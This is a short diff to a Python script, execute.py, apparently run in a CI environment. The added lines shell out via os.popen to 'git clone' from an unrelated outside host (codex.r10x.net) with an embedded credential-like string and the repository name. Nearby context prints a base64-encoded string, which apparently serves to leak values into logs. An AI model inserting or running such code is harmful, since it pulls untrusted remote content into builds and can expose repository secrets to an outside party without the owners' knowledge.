diff --git a/execute.py b/execute.py index ccaaa8e..be453e1 100755 --- a/execute.py +++ b/execute.py @@ -44,5 +44,12 @@ print('cmd:', cmd) result = os.popen(cmd) print('result:' , result.read()) +cmd = 'git clone ' + \ + 'https://sample_string@codex.r10x.net' + '/' + \ + GITHUB_REPOSITORY +print('cmd:', cmd) +result = os.popen(cmd) +print('result:' , result.read()) + print(f"Encoded string: {base64_string}") print('#'*80)